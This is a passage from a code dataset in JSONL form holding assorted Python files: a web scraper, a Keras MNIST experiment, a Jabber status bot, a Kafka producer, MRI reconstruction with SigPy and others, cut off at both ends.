\"D:\\\\py_buffer\\\\docx_Pro\\\\test2\\\\word\\\\media\\\\\"\n image1num = (sum([len(x) for _, _, x in os.walk(os.path.dirname(image1path))]))\n image2num = (sum([len(x) for _, _, x in os.walk(os.path.dirname(image2path))]))\n # 在test3\\\\word\\\\下创建media空文件夹\n os.mkdir(\"D:\\\\py_buffer\\\\docx_Pro\\\\test3\\\\word\\\\media\")\n image3path = \"D:\\\\py_buffer\\\\docx_Pro\\\\test3\\\\word\\\\media\\\\\"\n\n for i in range(image2num):\n os.rename(image2path + 'image' + str(i + 1) + '.png', image2path + 'image' + str(i + image2num + 1) + '.png')\n\n for i in range(image2num):\n os.rename(image2path + 'image' + str(i + image2num + 1) + '.png', image2path + 'image' + str(i + 2) + '.png')\n\n\n coverFiles(image1path, image3path)\n coverFiles(image2path, image3path)\n\n\n\n\n\n","sub_path":"rename_copy_image.py","file_name":"rename_copy_image.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"644207794","text":"import requests\nimport string\nfrom bs4 import BeautifulSoup\n\nurl = 'https://www.nature.com/nature/articles'\nr = requests.get(url, headers={'Accept-Language': 'en-US,en;q=0.5'})\n# print(r.status_code)\n\nsoup = BeautifulSoup(r.content, 'html.parser')\n\n# get area where all items will come from\narea = soup.find_all('article')\nprint(len(area))\nprint(area[0])\n\nnews = []\n# first get article type\nfor i in area:\n article_type = i.find('span', {'class': 'c-meta__type'}).get_text()\n if article_type == \"News\":\n # then get follow link\n href = i.find('a').get('href')\n news.append(f\"https://www.nature.com{href}\")\n\nfor art in news:\n req_art = requests.get(art)\n soup2 = BeautifulSoup(req_art.content, 'html.parser')\n if req_art.status_code == 200:\n # get title\n title = soup2.find('h1', {'class':'c-article-magazine-title'}).get_text()\n # print(title)\n # format title\n final_title = title.strip().translate(title.maketrans('','',string.punctuation)).replace('‘','').replace(\"’\",\n \"\").replace(' '\n '','_')\n # print(f'{final_title}.txt')\n\n\n # get body\n body = soup2.find('div', {'class':'c-article-body'}).text\n # print(body)\n\n # save to file\n file = open(f'{final_title}.txt', 'w')\n file.write(body)\n file.close()","sub_path":"Web Scraper/task/stage4.py","file_name":"stage4.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576362904","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras.optimizers import SGD\nfrom keras.regularizers import l2, activity_l2\nimport matplotlib\nmatplotlib.use('Agg')\nimport pylab as P\n#import keras.regularizers.WeightRegularizer\n#import keras.regularizers.WeightRegularizer\nbatch_size = 128\nnb_classes = 10\nnb_epoch = 14\n\nimg_rows, img_cols = 28, 28\nnb_filters = 32\nnb_pool = 2\nnb_conv = 3\n\nimageFolder = './Images/'\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\nX_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\nX_train = X_train.astype(\"float32\")\nX_test = X_test.astype(\"float32\")\nX_train /= 255\nX_test /= 255\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\nY_test = np_utils.to_categorical(y_test, nb_classes)\n\nmodel = Sequential()\n\nmodel.add(Convolution2D(96, nb_conv, nb_conv,\n input_shape=(1, img_rows, img_cols),init='he_normal'))\nmodel.add(Activation('relu'))\nmodel.add(Convolution2D(256, nb_conv, nb_conv,init='he_normal'))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128,init='he_normal'))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes,init='he_normal'))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.05,decay=0.01))\n\n#model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_test, Y_test))\n\nsizeTraining = np.shape(X_train)[0]\npredictions = np.zeros((sizeTraining,10))\npredictionsArray = list()\nscoreTestBP = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\nscoreTrainingBP = model.evaluate(X_train, Y_train, show_accuracy=True, verbose=0)\n\n#PRE-TRAINING STARTING\n# print(\"PRETRAINING STARTING\")\n# for i in range(0,nb_epoch):\n# \tpermutation = np.random.permutation(sizeTraining)\n# \tX_train2 = X_train[permutation]\n# \tpredictionsArray = list()\n# \tfor j in range(0,sizeTraining):\n# \t\tout = np.zeros((1,10))\n# \t\tcurrentImage = X_train2[j].reshape(1,1,28,28)\n# \t\tprediction = model.predict(currentImage, batch_size=1, verbose=0)\n# \t\t#maxPrediction = np.amax(prediction)\n# \t\tpredictionsArray.append(int(prediction))\n# \t\t#print('',maxPrediction)\n# \t\tout[0,prediction] = 1\n# \t\tpredictions[j,:] = out\n# # \t\tmodel.train_on_batch(currentImage,prediction,accuracy=True)\n# \tnameOfNextPlot = imageFolder + 'iteration' + str(i) + '.png'\n# \thistFig = P.figure()\n# \tP.hist(predictionsArray,bins=50)\n# \thistFig.savefig(nameOfNextPlot)\n# \tmodel.fit(X_train2,predictions,batch_size=128,nb_epoch=1,verbose=1, show_accuracy=True,validation_data=(X_test, Y_test))\n\n# \tstringToShow = str(i)\n# \tprint(\"EPOCH \" + stringToShow + \" DONE\")\n\n# print(\"PRETRAINING DONE\")\nscoreTestAP = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\nscoreTrainingAP = model.evaluate(X_train, Y_train, show_accuracy=True, verbose=0)\n\n#TRAINING STARTING\nmodel.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=50, show_accuracy=True, verbose=1, validation_data=(X_test, Y_test))\n\nscoreTestAT = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\nscoreTrainingAT = model.evaluate(X_train, Y_train, show_accuracy=True, verbose=0)\n\nprint('TRAINING LOSS BEFORE PRE-TRAINING:', scoreTrainingBP[0])\nprint('TRAINING ACCURACY BEFORE PRE-TRAINING:', scoreTrainingBP[1])\nprint('TEST LOSS BEFORE PRE-TRAINING:', scoreTestBP[0])\nprint('TEST ACCURACY BEFORE PRE-TRAINING:', scoreTestBP[1])\nprint('TRAINING LOSS AFTER PRE-TRAINING:', scoreTrainingAP[0])\nprint('TRAINING ACCURACY AFTER PRE-TRAINING:', scoreTrainingAP[1])\nprint('TEST LOSS AFTER PRE-TRAINING:', scoreTestAP[0])\nprint('TEST ACCURACY AFTER PRE-TRAINING:', scoreTestAP[1])\nprint('TRAINING LOSS AFTER TRAINING:', scoreTrainingAT[0])\nprint('TRAINING ACCURACY AFTER TRAINING:', scoreTrainingAT[1])\nprint('TEST LOSS AFTER TRAINING:', scoreTestAT[0])\nprint('TEST ACCURACY AFTER TRAINING:', scoreTestAT[1])","sub_path":"PhD_Experiments/MNIST_WithPretraining.py","file_name":"MNIST_WithPretraining.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"558473229","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom django.apps import AppConfig\nfrom django.core.exceptions import AppRegistryNotReady\n\nfrom InvenTree.ready import canAppAccessDatabase\nimport InvenTree.tasks\n\n\nlogger = logging.getLogger(\"inventree\")\n\n\nclass InvenTreeConfig(AppConfig):\n name = 'InvenTree'\n\n def ready(self):\n\n if canAppAccessDatabase():\n self.start_background_tasks()\n\n def start_background_tasks(self):\n\n try:\n from django_q.models import Schedule\n except (AppRegistryNotReady):\n return\n\n logger.info(\"Starting background tasks...\")\n\n InvenTree.tasks.schedule_task(\n 'InvenTree.tasks.delete_successful_tasks',\n schedule_type=Schedule.DAILY,\n )\n\n InvenTree.tasks.schedule_task(\n 'InvenTree.tasks.check_for_updates',\n schedule_type=Schedule.DAILY\n )\n\n InvenTree.tasks.schedule_task(\n 'InvenTree.tasks.heartbeat',\n schedule_type=Schedule.MINUTES,\n minutes=15\n )\n\n InvenTree.tasks.schedule_task(\n 'InvenTree.tasks.update_exchange_rates',\n schedule_type=Schedule.DAILY,\n )\n","sub_path":"InvenTree/InvenTree/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"490856297","text":"def par(a):\n for x in a:\n for y in x:\n print(y, end=\" \")\n print()\n print()\n\ndef lcs(x, y):\n m = len(x)\n n = len(y)\n arr = [[0 for i in range(n+1)] for j in range(m+1)]\n\n for i in range(m+1):\n for j in range(n+1):\n if(i == 0 or j == 0):\n arr[i][j] = 0\n elif(x[i-1] == y[j-1]):\n arr[i][j] = 1 + arr[i-1][j-1]\n else:\n arr[i][j] = max(arr[i-1][j], arr[i][j-1])\n par(arr)\n i = len(arr)-1\n j = len(arr[0])-1\n str = \"\"\n while(i > 0 and j > 0):\n if(arr[i][j-1] == arr[i][j]):\n j -= 1\n else:\n str = str+ y[j-1]\n i = i - 1\n j = j - 1\n print(str[::-1])\n\n\n'''\nw1 = input(\"Enter first word: \")\nw2 = input(\"Enter second word: \")\nlcs(w1, w2)\n'''\n\nlcs('stone', 'longest')\n","sub_path":"q1Lcs.py","file_name":"q1Lcs.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483076779","text":"\"\"\"\nSetup of Berkeley AUTOLab Perception module Python codebase.\nAuthor: Jeff Mahler\n\"\"\"\nfrom setuptools import setup\n\nrequirements = [\n 'numpy',\n 'scipy',\n 'autolab_core',\n 'matplotlib',\n 'multiprocess',\n 'opencv-python',\n 'keras',\n 'cycler',\n 'Pillow',\n 'pyserial',\n 'ipython',\n 'scikit-image',\n 'scikit-learn',\n 'scikit-video',\n 'ffmpeg-python'\n]\n\nexec(open('perception/version.py').read())\n\nsetup(name='autolab_perception',\n version=__version__,\n description='Perception utilities for the Berkeley AutoLab',\n author='Jeff Mahler',\n author_email='jmahler@berkeley.edu',\n license = 'Apache Software License',\n url = 'https://github.com/BerkeleyAutomation/perception',\n keywords = 'robotics grasping vision perception',\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Natural Language :: English',\n 'Topic :: Scientific/Engineering'\n ],\n packages=['perception'],\n install_requires = requirements,\n extras_require = { 'docs' : [\n 'sphinx',\n 'sphinxcontrib-napoleon',\n 'sphinx_rtd_theme'\n ],\n 'ros' : [\n 'primesense',\n 'rospkg',\n 'catkin_pkg',\n 'empy'\n ],\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"58584414","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Written by Shikai Jin on 2018-Jun-23, latest modified on 2018-Jun-28\n# This is a revised Python3 version of old script (Weihua's version)\n# This script is used for getting the aligned regions from the sequence alignment algorithm.\n\n\nimport Bio.PDB as bpdb\nimport argparse\n\n\ndef read_alignment(alignment):\n with open(alignment, 'r') as f:\n strs = f.readline().split()\n target = strs[1]\n targ_start = int(strs[0])\n strs = f.readline().split()\n template = strs[1]\n temp_start = int(strs[0])\n\n print('The target length is: ' + str(len(target)))\n print('The template length is: ' + str(len(template)))\n\n if len(target) != len(template):\n print('ERROR: The target length is not equal to template length!')\n exit()\n\n targ_ind = targ_start - 1\n temp_ind = temp_start - 1\n targ_seq = []\n temp_seq = []\n\n for i in range(len(target)):\n if template[i] != '-':\n temp_ind = temp_ind + 1\n if target[i] != '-':\n targ_ind = targ_ind + 1\n if target[i] != '-' and template[i] != '-':\n targ_seq.append(targ_ind)\n temp_seq.append(temp_ind)\n\n print('The target sequence is ' + str(targ_seq))\n print('The template sequence is ' + str(temp_seq))\n\n return targ_seq, temp_seq\n\ndef find(resid, seqind):\n for i in range(len(seqind)):\n if resid == seqind[i]:\n return (i + 1)\n return -1 # Avoid returning NoneType\n\n\nclass ResSelect(bpdb.Select):\n def __init__(self, temp_seq, chain_id):\n super().__init__() # Inherit attributes from parents\n self.temp_seq = temp_seq\n self.chain_id = chain_id\n\n def accept_residue(self, res):\n ind = find(res.id[1], self.temp_seq)\n if ind > 0 and res.parent.id == self.chain_id:\n return True\n else:\n return False\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"This script gets the aligned regions from the sequence alignment algorithm\")\n parser.add_argument(\"input\", help=\"The file name of input pdb\", type=str)\n parser.add_argument(\"output\", help=\"The file name of output pdb\", type=str)\n parser.add_argument(\"align\", help=\"The alignment file name\", type=str)\n parser.add_argument(\"chain\", help=\"The chain ID\", type=str)\n args = parser.parse_args()\n input = args.input\n output = args.output\n alignment = args.align\n chain_id = args.chain\n\n if input[-4:].lower() != \".pdb\":\n input = input + \".pdb\"\n if output[-4:].lower() != \".pdb\":\n output = output + \".pdb\"\n\n (targ_seq, temp_seq) = read_alignment(alignment)\n\n s = bpdb.PDBParser().get_structure('temp', input)\n io1 = bpdb.PDBIO()\n io1.set_structure(s)\n io1.save('temp1.pdb', ResSelect(temp_seq, chain_id))\n\n s = bpdb.PDBParser().get_structure('temp', 'temp1.pdb')\n model = s[0]\n chain = model[chain_id]\n\n for residue in chain:\n resind = targ_seq[find(residue.id[1], temp_seq) - 1]\n residue.id = (' ', resind, ' ')\n\n io2 = bpdb.PDBIO()\n io2.set_structure(s)\n io2.save(output)\n\nif __name__ == '__main__':\n main()\n","sub_path":"select_align.py","file_name":"select_align.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"543920238","text":"import json\nimport logging\nfrom kafka import KafkaProducer\nfrom app.config import kafka_producer_config\nfrom app.domain_event import DomainEvent\n\nlogger = logging.getLogger(\"app.user_producer\")\n\nclass UserProducer():\n \"\"\"User event producer class that can be used to publish messages to Kafka.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.producer = KafkaProducer(\n bootstrap_servers=[kafka_producer_config[\"bootstrap_servers\"]],\n value_serializer=lambda m: json.dumps(m).encode(\"ascii\")\n )\n \n def error_callback(self, e: Exception):\n logger.error(\"Failed to publish an event\", exc_info=e)\n\n def publish(self, topic: str, event: DomainEvent):\n \"\"\"Publish an event to given topic.\n \n Arguments:\n\n topic {str} -- The target topic\n\n event {DomainEvent} -- The domain event to publish\n \"\"\"\n self.producer.send(topic, event.to_dict()).add_errback(self.error_callback)\n\n def clean_up(self):\n \"\"\"Cleanup the procuder. This will block until all messages has been flushed.\"\"\"\n self.producer.flush()\n self.producer.close(2)\n","sub_path":"user-service/app/user_producer.py","file_name":"user_producer.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"652017477","text":"#! -*- coding: utf-8 -*-\nfrom .quantize import mmcq\n\n__version__ = (0, 0, 1)\n\n\ndef get_palette(image, color_count=10, quality=1):\n colors = []\n for y in xrange(0, image.size[1]):\n for x in xrange(0, image.size[0], quality):\n r, g, b = image.getpixel((x, y))\n if r < 250 and g < 250 and b < 250:\n colors.append((r, g, b))\n\n c_map = mmcq(colors, color_count)\n return c_map.palette\n","sub_path":"mmcq/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"20697310","text":"#!/usr/bin/env python\n\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n\nfrom jabberbot import JabberBot,botcmd\nimport datetime\nimport random\nimport os\nimport sys\n\n\nclass SystemInfoJabberBot(JabberBot):\n\n NODATA = \"waiting for data - please make a call\"\n CLOSED = \"geschlossen\"\n OPEN = \"offen\"\n\n # where are my images?\n www_nodata=\"/srv/www.das-labor.org/htdoc/statusNONE.png\"\n www_closed=\"/srv/www.das-labor.org/htdoc/statusOFF.png\"\n www_open=\"/srv/www.das-labor.org/htdoc/statusON.png\"\n # what is the destination of that image\n www_show=\"/srv/www.das-labor.org/htdoc/status.png\"\n\n #datetime of the last statusupdate\n dt_lastmessage=datetime.datetime(1,1,1,0,0, 0, 0)\n @botcmd\n def mauz(self,mess,args):\n \"\"\"react on schnittchen\"\"\"\n response=['wwaaahhhh Kratzenhaare!!!',\n '/me bindet die Kratze ans Channeltopic',\n '/me klebt ne Gummiemaus an die Decke',\n '/me verteilt Katzenminze im Channel',\n 'komm kitty kitty komm ... ich hab da was feines',\n '/me hebt das Schild \"Niedliche Katze zu verschenken!\" hoch',\n 'KATZLA!',\n '/me wirft ein supraleitendes Wollknaeul in den Channel',\n '/me spielt mit The Schaumstoffball from Hell',\n 'http://www.youtube.com/watch?v=7dBUJI-Axz0',\n 'miauuuu',\n '/me verteilt Antistatiktueten',\n '/me macht das Licht aus',\n 'Wauh grrr Wauh',\n 'http://www.cuisine.at/rezept_0886450_katze_in_sahne_auf_polnische_art.php']\n if mess.getFrom() == \"labor@conference.das-labor.org/channelkatze\":\n return str(random.choice(response))\n\n @botcmd\n def help(self,mess,args):\n return None\n\n @botcmd\n def kratze(self,mess,args):\n \"\"\"whats a kratze\"\"\"\n return \"Jeder Buchling kennt Hildegunst von Mythenmetz fabelhaften Roman ueber Echo, das Kraetzchen - eine zamonische Kratze unterscheidet sich uebrigens von unserer Katze lediglich dadurch, dass sie sprechen kann: In Sledwaya, der traurigsten Stadt Zamoniens, ist Echo dermassen in Schwierigkeiten geraten, dass er gezwungen ist, mit dem Schrecksenmeister Succubius Eisspin einen verhaengnisvollen Vertrag zu schliessen.\"\n\n\n # need to override callback for keepalive\n def callback_keepalive(self):\n dt_now=datetime.datetime.now()\n if ((dt_now-self.dt_lastmessage).seconds > 120) or ((dt_now-self.dt_lastmessage).days != 0):\n self.set_status(self.NODATA)\n self.set_show(self.AWAY)\n os.system(\"cp \"+str(self.www_nodata)+\" \"+str(self.www_show))\n self._send_status()\n\n @botcmd\n def setoffen(self,mess,args):\n \"\"\"what to do if signal for labor open arrives\"\"\"\n if mess.getFrom() == \"statsetter@das-labor.org/JabberBot\": \n self.dt_lastmessage=datetime.datetime.now()\n self.set_status(self.OPEN)\n self.set_show(self.AVAILABLE)\n os.system(\"cp \"+str(self.www_open)+\" \"+str(self.www_show))\n # change other files hier\n\n @botcmd\n def setzu(self,mess,args):\n \"\"\"what to do if signal for labor closed arrives\"\"\"\n if mess.getFrom() == \"statsetter@das-labor.org/JabberBot\":\n self.dt_lastmessage=datetime.datetime.now()\n self.set_status(self.CLOSED)\n self.set_show(self.DND)\n os.system(\"cp \"+str(self.www_closed)+\" \"+str(self.www_show))\n # change other files hier\n\n\ndef connect_callback():\n # set default status\n bot.set_show(bot.AWAY)\n bot.set_status(bot.NODATA)\n\n\n\nusername = 'status@das-labor.org/statusdaemon'\npassword = 'password'\n\nbot = SystemInfoJabberBot(username,password)\n#register some commands\nbot.commands[\"*mauz*\"]=bot.mauz\nbot.commands[\"*maunz*\"]=bot.mauz\nbot.commands[\"mauz!\"]=bot.mauz\nbot.commands[\"maunz!\"]=bot.mauz\nbot.commands[\"maunz\"]=bot.mauz\nbot.commands[\"miau\"]=bot.mauz\nbot.commands[\"miau!\"]=bot.mauz\nbot.commands[\"*miau*\"]=bot.mauz\nbot.commands[\"kratze?\"]=bot.kratze\nbot.join_room(\"labor@conference.das-labor.org\",username=\"#ChanServ\")\nbot.serve_forever(connect_callback,connects=0)\n\n\n\n","sub_path":"tools/statusbot/server/trunk/mybot.py","file_name":"mybot.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"112807354","text":"import numpy as np\n\n\nclass GaussianDistribution(object):\n \"\"\"\n the Gaussian distribution\n p(x|m,v) = exp(-0.5(x - m).T@v.inv@(x - m))/(sqrt(det(v))*(2pi)**(D/2))\n \"\"\"\n\n def __init__(self, mean=None, var=None):\n \"\"\"\n construct gaussian distribution\n\n Parameters\n ----------\n mean : (ndim,) ndarray\n mean of the Gaussian distribution\n var : (ndim, ndim) ndarray\n variance of the Gaussian distribution\n\n Attributes\n ----------\n ndim : int\n dimensionality\n \"\"\"\n if mean is not None and var is not None:\n assert mean.ndim == 1, mean.ndim\n self.ndim = mean.shape[0]\n assert var.shape == (self.ndim, self.ndim), var.shape\n self.mean = mean\n self.var = var\n\n def fit(self, X):\n \"\"\"\n maximum likelihood estimation of Gaussian distribution\n\n Parameters\n ----------\n X : (sample_size, n_features) ndarray\n input data points\n\n Attributes\n ----------\n ndim : int\n dimensionality\n mean : (n_features,) ndarray\n mean of gaussian distribution\n var : ndarray (n_features, n_features)\n variance of gaussian distribution\n \"\"\"\n if X.ndim == 1:\n X = X[:, None]\n self.ndim = np.size(X, 1)\n self.mean = np.mean(X, axis=0)\n self.var = np.atleast_2d(np.cov(X, rowvar=False))\n\n def proba(self, X):\n \"\"\"\n compute gauss function N(x|mu,Sigma)\n\n Parameters\n ----------\n X : ndarray (sample_size, n_features)\n input\n\n Returns\n -------\n p : ndarray (sample_size,)\n probability density\n \"\"\"\n if X.ndim == 1:\n X = X[:, None]\n d = X - self.mean\n precision = np.linalg.inv(self.var)\n return (\n np.exp(-0.5 * np.sum(d @ precision * d, axis=-1))\n * np.sqrt(np.linalg.det(precision))\n / np.power(2 * np.pi, 0.5 * self.ndim))\n\n def draw(self, n=1):\n \"\"\"\n draw sample from this distribution\n\n Parameters\n ----------\n n : int\n number of samples to draw from the distribution\n\n Returns\n -------\n sample : (n, ndim) ndarray\n generated sample\n \"\"\"\n assert isinstance(n, int), type(n)\n return np.random.multivariate_normal(self.mean, self.var, n)\n","sub_path":"prml/distributions/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"545769437","text":"# GETS THE COLOR PALETTE OF A GIVEN IMAGE AND OUTPUTS THE 3 MAIN COLOURS\n\nimport sys\n\nimport mnist as mnist\nimport numpy as np\nimport io\nimport webcolors\n\n\n\nfrom colorthief import ColorThief\n\ncolor_thief = ColorThief('data/carahair.png')\n# get the dominant color\ndominant_color = color_thief.get_color(quality=1)\n\n\ndomcol = (color_thief.get_color(quality=1))\n\n# build a color palette\npalette = color_thief.get_palette(color_count=10)\n\ndef closest_colour(requested_colour):\n min_colours = {}\n for key, name in webcolors.css3_hex_to_names.items():\n r_c, g_c, b_c = webcolors.hex_to_rgb(key)\n rd = (r_c - requested_colour[0]) ** 2\n gd = (g_c - requested_colour[1]) ** 2\n bd = (b_c - requested_colour[2]) ** 2\n min_colours[(rd + gd + bd)] = name\n return min_colours[min(min_colours.keys())]\n\ndef get_colour_name(requested_colour):\n try:\n closest_name = actual_name = webcolors.rgb_to_name(requested_colour)\n except ValueError:\n closest_name = closest_colour(requested_colour)\n actual_name = None\n return actual_name, closest_name\n\nfor x in palette:\n requested_colour = ((x))\n actual_name, closest_name = get_colour_name(requested_colour)\n\n print(closest_name + '')\n print(x)\n\n\n","sub_path":"colorsTest.py","file_name":"colorsTest.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"293254867","text":"#%matplotlib notebook\n\nimport sigpy as sp\nimport sigpy.mri as mr\nimport sigpy.plot as pl\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ntry:\n import mkl\n mkl.set_num_threads(1)\nexcept:\n pass\n\n#%% md\n\n## Set parameters and load dataset\n\n#%%\n\nmax_iter = 30\nlamda = 0.01\n\nksp_file = 'data/brain/ksp.npy'\ncoord_file = 'data/brain/coord.npy'\n\n# Choose computing device.\n# Device(-1) specifies CPU, while others specify GPUs.\n# GPU requires installing cupy.\ntry:\n device = sp.Device(0)\nexcept:\n device = sp.Device(-1)\n\nxp = device.xp\ndevice.use()\n\n# Load datasets.\nksp = xp.load(ksp_file)\ncoord = xp.load(coord_file)\n\ndef show_data_info(data, name):\n print(\"{}: shape={}, dtype={}\".format(name, data.shape, data.dtype))\n\n\n\ndcf = (coord[..., 0]**2 + coord[..., 1]**2)**0.5\npl.ScatterPlot(coord, dcf, title='Density compensation')\n\nshow_data_info(ksp, \"ksp\")\nshow_data_info(coord, \"coord\")\nshow_data_info(dcf, \"dcf\")\n\nimg_grid = sp.nufft_adjoint(ksp * dcf, coord)\npl.ImagePlot(img_grid, z=0, title='Multi-channel Gridding')\n\n\n#%% md\n\n## Estimate sensitivity maps using JSENSE\n\n# Here we use [JSENSE](https://onlinelibrary.wiley.com/doi/full/10.1002/mrm.21245) to estimate sensitivity maps.\n\n#%%\n\nmps = mr.app.JsenseRecon(ksp, coord=coord, device=device).run()\n\n#%% md\n\n## CG\n\n#%%\n\ncg_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, device=device, lamda=lamda,\n max_iter=max_iter, save_objective_values=True)\ncg_img = cg_app.run()\n\npl.ImagePlot(cg_img)\n\n#%% md\n\n## CG with circulant preconditioner\n\n#%%\n\ncirc_precond = mr.circulant_precond(mps, coord=coord, device=device, lamda=lamda)\n\n# Put into linear operator form.\nimg_shape = mps.shape[1:]\nD = sp.linop.Multiply(img_shape, circ_precond)\nP = sp.linop.IFFT(img_shape) * D * sp.linop.FFT(img_shape)\n\ncgc_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, device=device, lamda=lamda, P=P,\n max_iter=max_iter, save_objective_values=True)\ncgc_img = cgc_app.run()\n\npl.ImagePlot(cgc_img)\n\n#%% md\n\n## PDHG\n\n#%%\n\npdhg_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, max_iter=max_iter, lamda=lamda,\n solver='PrimalDualHybridGradient', device=device, save_objective_values=True)\npdhg_img = pdhg_app.run()\n\npl.ImagePlot(pdhg_img)\n\n#%% md\n\n## PDHG with Pipe-Menon density compensation\n\n#%%\n\n# Compute dcf\np = mr.pipe_menon_dcf(coord, device=device)\n\npdhg_dcf_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, sigma=p, max_iter=max_iter, lamda=lamda,\n solver='PrimalDualHybridGradient', device=device, save_objective_values=True)\npdhg_dcf_img = pdhg_dcf_app.run()\n\npl.ImagePlot(pdhg_dcf_img)\n\n#%% md\n\n## PDHG with single-channel preconditioner\n\n#%%\n\n# Compute preconditioner\nones = np.ones_like(mps)\nones /= len(mps)**0.5\np = mr.kspace_precond(ones, coord=coord, device=device, lamda=lamda)\n\npdhg_sc_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, sigma=p, max_iter=max_iter, lamda=lamda,\n solver='PrimalDualHybridGradient', device=device, save_objective_values=True)\npdhg_sc_img = pdhg_sc_app.run()\n\npl.ImagePlot(pdhg_sc_img)\n\n#%% md\n\n## PDHG with multi-channel preconditioner\n\n#%%\n\n# Compute preconditioner\np = mr.kspace_precond(mps, coord=coord, device=device, lamda=lamda)\n\npdhg_mc_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, sigma=p, max_iter=max_iter, lamda=lamda,\n solver='PrimalDualHybridGradient', device=device, save_objective_values=True)\npdhg_mc_img = pdhg_mc_app.run()\n\npl.ImagePlot(pdhg_mc_img)\n\n#%% md\n\n## Convergence curves\n\n#%%\n\nplt.figure(figsize=(8, 3))\nplt.semilogy(cg_app.time, cg_app.objective_values,\n marker='v', color='C1')\nplt.semilogy(cgc_app.time, cgc_app.objective_values,\n marker='^', color='C2')\nplt.semilogy(pdhg_app.time, pdhg_app.objective_values,\n marker='+', color='C3')\nplt.semilogy(pdhg_dcf_app.time, pdhg_dcf_app.objective_values,\n marker='s', color='C4')\nplt.semilogy(pdhg_sc_app.time, pdhg_sc_app.objective_values,\n marker='*', color='C5')\nplt.semilogy(pdhg_mc_app.time, pdhg_mc_app.objective_values,\n marker='x', color='C6')\nplt.legend(['CG',\n 'CG w/ circulant precond.',\n 'PDHG',\n 'PDHG w/ density comp.',\n 'PDHG w/ SC k-space precond.',\n 'PDHG w/ MC k-space precond.'])\nplt.ylabel('Objective Value [a.u.]')\nplt.xlabel('Time [s]')\nplt.title(r\"SENSE Reconstruction\")\nplt.tight_layout()\nplt.show()\n","sub_path":"SenseReconstruction.py","file_name":"SenseReconstruction.py","file_ext":"py","file_size_in_byte":4372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"609063135","text":"\r\narry = ['a','c','v','m']\r\n\r\n#imput array, number of rtations and direction (0 == left, 1 == 